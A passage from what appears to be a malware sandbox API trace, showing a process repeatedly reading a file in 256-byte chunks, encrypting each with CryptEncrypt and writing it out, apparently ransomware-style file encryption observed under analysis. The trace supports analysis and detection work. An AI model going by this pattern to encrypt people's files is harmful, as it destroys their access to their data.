lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0173.031] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0173.031] GetLastError () returned 0x0 [0173.031] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0173.031] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0173.031] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0173.031] GetLastError () returned 0x0 [0173.031] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0173.031] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0173.031] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0173.031] GetLastError () returned 0x0 [0173.031] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0173.031] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0173.031] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0173.031] GetLastError () returned 0x0 [0173.031] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0173.031] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0173.031] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0173.032] GetLastError () returned 0x0 [0173.032] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0173.032] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0173.032] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0173.032] GetLastError () returned 0x0 [0173.032] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0173.032] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0173.032] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0173.032] GetLastError () returned 0x0 [0173.032] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0173.032] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0173.032] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0173.032] GetLastError () returned 0x0 [0173.032] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0173.032] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0173.032] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0173.032] GetLastError () returned 0x0 [0173.032] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0173.032] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0173.032] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0173.032] GetLastError () returned 0x0 [0173.032] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0173.032] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0173.032] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0173.032] GetLastError () returned 0x0 [0173.032] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0173.033] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0173.033] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0173.033] GetLastError () returned 0x0 [0173.033] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0173.033] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0173.033] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0173.033] GetLastError () returned 0x0 [0173.033] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0173.033] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0173.033] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0173.033] GetLastError () returned 0x0 [0173.033] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0173.033] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0173.033] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0173.033] GetLastError () returned 0x0 [0173.033] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0173.033] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0173.033] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0173.033] GetLastError () returned 0x0 [0173.033] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0173.033] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0173.034] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0173.034] GetLastError () returned 0x0 [0173.034] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0173.034] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0173.034] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0173.034] GetLastError () returned 0x0 [0173.034] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0173.034] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0173.034] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0173.034] GetLastError () returned 0x0 [0173.034] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0173.034] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0173.034] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0173.034] GetLastError () returned 0x0 [0173.034] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0173.034] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0173.034] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0173.034] GetLastError () returned 0x0 [0173.034] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0173.034] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0173.034] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0173.034] GetLastError () returned 0x0 [0173.034] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0173.035] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0173.035] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0173.035] GetLastError () returned 0x0 [0173.035] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0173.035] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0173.035] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0173.035] GetLastError () returned 0x0 [0173.035] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0173.035] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0173.035] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0173.035] GetLastError () returned 0x0 [0173.035] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0173.035] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0173.035] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0173.035] GetLastError () returned 0x0 [0173.035] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0173.035] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0173.035] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0173.035] GetLastError () returned 0x0 [0173.035] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0173.035] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0173.035] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0173.035] GetLastError () returned 0x0 [0173.035] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0173.036] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0173.036] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0173.036] GetLastError () returned 0x0 [0173.036] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0173.036] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0173.036] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0173.036] GetLastError () returned 0x0 [0173.036] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0173.036] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0173.036] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0173.036] GetLastError () returned 0x0 [0173.036] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0173.036] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0173.036] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, 